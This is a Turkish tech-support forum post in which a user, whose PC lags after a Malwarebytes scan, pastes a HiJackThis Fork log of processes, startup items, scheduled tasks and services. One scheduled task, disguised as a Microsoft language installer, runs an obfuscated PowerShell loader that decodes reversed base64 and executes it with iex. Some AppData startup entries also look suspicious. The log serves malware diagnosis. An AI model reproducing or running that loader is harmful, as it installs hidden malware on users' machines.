Malwarebytes taramasından sonra bilgisayarda takılma

Logfile of HiJackThis Fork by Alex Dragokas v.2.9.0.26

Platform:  x64 Windows 10 (Home), 10.0.18363.1316 (ReleaseId: 1909), Service Pack: 0
Time:      01.02.2021 - 10:17 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: English (0x409)
Elevated:  Yes
Ran by:    Celal    (group: Administrator) on M4A1-COLT, FirstRun: yes

Chrome:  88.0.4324.104
Edge:    11.0.18362.1316
Internet Explorer: 11.0.18362.1
Default: "C:\Users\acer\AppData\Local\Programs\Opera\Launcher.exe" -noautoupdate -- "%1" (Opera Internet Browser)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
   1  C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
   1  C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
   1  C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
   1  C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
   1  C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
   1  C:\Program Files\AMD\CNext\CNext\amdow.exe
   1  C:\Program Files\Acer\Quick Access Service\QALauncher.exe
   1  C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe
   1  C:\Program Files\Riot Vanguard\vgtray.exe
   1  C:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe
   1  C:\Program Files\WindowsApps\28017CharlesMilette.TranslucentTB_9.0.0.0_x86__v826wp6bftszj\TranslucentTB\TranslucentTB.exe
   1  C:\Program Files\WindowsApps\Microsoft.MSPaint_6.2009.30067.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
   1  C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21011.101.0_x64__8wekyb3d8bbwe\YourPhone.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21011.101.0_x64__8wekyb3d8bbwe\YourPhoneServer\YourPhoneServer.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
   1  C:\Users\acer\AppData\Local\Microsoft\OneDrive\OneDrive.exe
   1  C:\Users\acer\Desktop\HiJackThis.exe
   1  C:\Windows\ImmersiveControlPanel\SystemSettings.exe
   1  C:\Windows\System32\ApplicationFrameHost.exe
   1  C:\Windows\System32\CastSrv.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atieclxx.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atiesrxx.exe
   1  C:\Windows\System32\RtkAudUService64.exe
   9  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SecurityHealthService.exe
   1  C:\Windows\System32\SettingSyncHost.exe
   1  C:\Windows\System32\SgrmBroker.exe
   1  C:\Windows\System32\audiodg.exe
   1  C:\Windows\System32\backgroundTaskHost.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\oobe\UserOOBEBroker.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
   1  C:\Windows\System32\sppsvc.exe
  81  C:\Windows\System32\svchost.exe
   1  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\usocoreworker.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\explorer.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = http://acer17win10.msn.com/?pc=ACTE
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\88.0.705.56\BHO\ie_to_edge_bho_64.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\88.0.705.56\BHO\ie_to_edge_bho.dll
O4 - HKCU\..\Run: [OneDrive] = C:\Users\acer\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (Microsoft)
O4 - HKCU\..\StartupApproved\Run: [Discord] = C:\Users\acer\AppData\Local\Discord\Update.exe --processStart Discord.exe (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [EpicGamesLauncher] = C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe -silent (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [GoogleDriveSync] = C:\Program Files\Google\Drive\googledrivesync.exe /autostart (2020/10/20)
O4 - HKCU\..\StartupApproved\Run: [Opera Browser Assistant] = C:\Users\acer\AppData\Local\Programs\Opera\assistant\browser_assistant.exe (2020/10/20)
O4 - HKCU\..\StartupApproved\Run: [Overwolf] = C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [ProductAuthenticationService] = C:\Users\acer\AppData\Roaming\ProductAuthenticationService\pas.exe /nogui (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [SteamServerBrowser] = C:\Users\acer\AppData\Roaming\SteamServerBrowser\SteamServerBrowser.exe (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [com.squirrel.WhatsApp.WhatsApp] = C:\Users\acer\AppData\Local\WhatsApp\Update.exe --processStart "WhatsApp.exe" (2020/10/26)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\RtkAudUService64.exe -background
O4 - HKLM\..\StartupApproved\Run32: [GrooveMonitor] = C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [LogMeIn Hamachi Ui] = C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe --auto-start (2020/11/23)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2020/09/21)
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2020/10/27)
O15 - Trusted Zone: *.localhost
O17 - DHCP DNS 1: 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{09f76097-5c82-4e33-8666-fbb75c0d0592}: [NameServer] = 1.0.1.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{09f76097-5c82-4e33-8666-fbb75c0d0592}: [NameServer] = 1.1.1.1 (Well-known DNS: Cloudflare / APNIC)
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveBlacklisted: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveSynced: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveSyncing: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21-32 - HKLM\..\ShellExecuteHooks: [{B5A7F190-DDA6-4420-B3BA-52453494E6CD}] - Groove GFS Stub Execution Hook - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (disabled)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub): Groove Explorer Icon Overlay 1 (GFS Unread Stub) - {99FD978C-D287-4F50-827F-B2C658EDA8E7} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub): Groove Explorer Icon Overlay 2 (GFS Stub) - {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder): Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) - {920E6DB1-9907-4370-B3A0-BAFC03D81399} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder): Groove Explorer Icon Overlay 3 (GFS Folder) - {16F3DD56-1AF5-4347-846D-7C10C4192619} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark): Groove Explorer Icon Overlay 4 (GFS Unread Mark) - {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\Windows\system32\MusNotification.exe /RunOnAC RebootDialog (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\Windows\system32\MusNotification.exe /RunOnBattery RebootDialog (Microsoft)
O22 - Task: (disabled) \S-1-5-21-1221631561-2260327829-492006883-1001\DataSenseLiveTileTask - C:\Windows\System32\DataUsageLiveTileTask.exe
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\Windows\system32\MusNotification.exe (Microsoft)
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AcerCMUpdateTask2.1.16258 - C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe /task
O22 - Task: BlueStacksHelper - C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe -sr
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: Opera GX scheduled Autoupdate 1600277062 - C:\Users\acer\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled Autoupdate 1600103977 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1600103979 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\acer\AppData\Local\Programs\Opera\assistant" $(Arg0)
O22 - Task: Overwolf Updater Task - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule
O22 - Task: Power Button - C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe -s
O22 - Task: Quick Access - C:\Program Files\Acer\Quick Access Service\QALauncher.exe
O22 - Task: Software Update Application - C:\ProgramData\OEM\UpgradeTool\ListCheck.exe
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartCNBM - C:\Program Files\AMD\CNext\CNext\cncmd.exe benchmark
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O22 - Task: UEIPInvitation - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\UEIPOOBECheck.exe
O22 - Task: UbtFrameworkService - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\TriggerFramework.exe
O22 - Task: \Microsoft\Windows\LanguageComponentsInstaller\LanguageComponentsInstaller - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = 'u322UuxD3GTQN8s/2TS1IboluWaBWNsK+wmJWtZLj3qfBZdq3mT8SeJi6gSPatYQkBGoCcVF4y3HQIVzqkazCYBm5n6eStMpvDHTJPtN1XuKT7cS8XHqdKZW5g6JBJc5qwSMT6sV7ziIDO8RpjPIOaQkyVu5UshW1z7PVds7rECOVdFchRWKB/o8xAKJUMhx6SL9Yp1m9RGnWtJA/nT5avgvwQSdS7RZi064CIR6hyOOe59E7AL+YOsGjzLcBpkN5AXDRfghqReVYNYDmwiOMq5nnl7CdaJjmm/zCaY6jVncAuhktCT0K9gYiTOfZJUOlhKZWKRT3gDzVapjjX+kRYkC4xWLI5ZrnVvdYKoAmQuqJ6c1hxHjd+dJvhHxYu4C7E7SOcAXlQ2qYv90rirOc5cMlwWnVZcFjkmHd5oHmHvQRfAV43fjS7JA1jOME/IBlTPvbpgBgjqzFo0W1EjvZq0AlXfjfZtl2ATpe5wP0FmyPadS42T7KZIklHPNSNFI3FipAdFBoV/lJ5R7837fSqwJnkiiZpYUpDb0ANxF5GrcVc5QvmmuFMxD2HH/XcpyhmfpCNpNpWriePVr8CfURdQv7gWQDYwJyCHLRpFlzU36EuV74AKmVJUBjAnKWsIA6HzUP51z4wyjXMB95WeRAc406STCW+YR73agWMID8nqhW+tk6xWgW8BSz0ncEs1ZpEHTWP4OpjWNPqo7kQa3U9Eb3WWSS8QwuQeTBag0gQOSEfJprg2XVaI2pQTzMdN+ogSeXcpr+GXoJLIowQ+TTeYTyE6JDJgqmV/fZtItrRSqSd0ciHudDdYv8hTWNu9trgGBZ/IXijvANclgmgSSYqQ3iWSiS79s0yOUHPRjyHXyas0YmQiIcoYVxUWaEeEbn1izGqBEjWr4V5oG+RTFRIxuw0SLYedZ2BqkSJkSrAfkYuUJjhu3PbBU+3fVJ/QWik67d+1l7W3eaIEAwgvpVaIJlxC1MZMG2yKec6lVpyCnHp53kRSFReVdnATpL9Q/o2vkEJsL1EzlfIkAlHPRKdJG+R/2XJwRnUavR/1y72v4VdUPn2DIDpoLmRP5SKka5BzrfNBGxTiuF+UFmQ2rapkEnGC/QI4b+iG7A4ow8mH6CJMN+kf/Av1yhSuvTNNOumbtdcxx2GmBTdBLpl3RRJgAwzeFW5J6mnniCbU7tRiSadBA1Q/4FNhF+CaHAYh74xnaFMdU2WuMEYNqokeNeP9e3nCeDZwZ9XPUOrxQyzvFT71ykTKME5Ue6kDeEb5TqnDDJ65kwEflTosQlWaMSNsytUjOQaNUzDvFRvgvulyUGLcw6lC1dpkjt0yBRIc+pHj9Zr0jlz7IP6ZdhUC2EZw4oxaJZp5x9AP7YesMnSfcAdhM8hHYVqN02BzNMLVf1iifeKddnQ+DZPgzu3n4BP5z0zaQAv517WnoYrEwiBWfb81FjBOJFaFMiDimNaJKjGrsS9kbvknWI5VgiwXRO6wNmkCud9Ud2g2qMLpFgBvzZ+4LvHzVIbdHhx2Nb/9043vlbpEY3Q2yWZZOihGKZoQQkmGXPrlKt0ndHIh7nQ3WLPYUkDywNbENnjqiVM5W1i+ufdEpg2nrZ4Apoku/bI5fnBX4NKFb1XzsCZgM1EOAGYxPuR7uB54K+Q/TK8Ra3lDFTdAFjCKAe50T0Tb4TdVIoiuVTdxU/Ge/Ho81+CzsUrEozHH1WKEVmmrRK6Jb7mSEFZwm7gmYM40WgXuXSqBMn3j/A+Vm01/BW5cimRLyVswy/n2VCpc6sxaNT9M0rmDCPrV+/2eNbaU+/mrTNZ0SyXH4deN26yDHW7llgACMBNRU7AzRQbEZszPVK/hl1FizEtYhlWOXF7hn4wuuDe5mjgOdFqo27AaRDfovrwK2Rptm9CSdBYZ3sTXtf6Yjl0uJEOAFgF3dFNMxgky8aoRE7BXnfeAWnifRHLcU4022FOZjxw==';iex('$d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -jo'+'in '''';$d=[Text.Encoding]::UTF'+2*2*2+'.GetString([Convert]::FromBase'+8*8+'String($d));$d|i'+'ex;')"
O22 - Task: \Oem\AcerJumpstartTask - C:\Program Files (x86)\Acer\Acer Jumpstart\hermes.exe /default
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atiesrxx.exe
O23 - Service R2: LMIGuardianSvc - C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
O23 - Service R2: LogMeIn Hamachi Tunneling Engine - (Hamachi2Svc) - C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe -s
O23 - Service R2: QMEmulatorService - C:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe
O23 - Service R2: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S2: Microsoft Office Click-to-Run Service - (ClickToRunSvc) - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe /service (file missing)
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\88.0.4324.104\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
O23 - Service S3: Overwolf Updater Windows SCM - (OverwolfUpdater) - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe /RunningFrom SCM
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\SteamService.exe /RunAsService
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe


--
End of file - Time spent: 11,2 sec. - 34930 bytes, CRC32: FFFFFFFF. Sign: 챒챰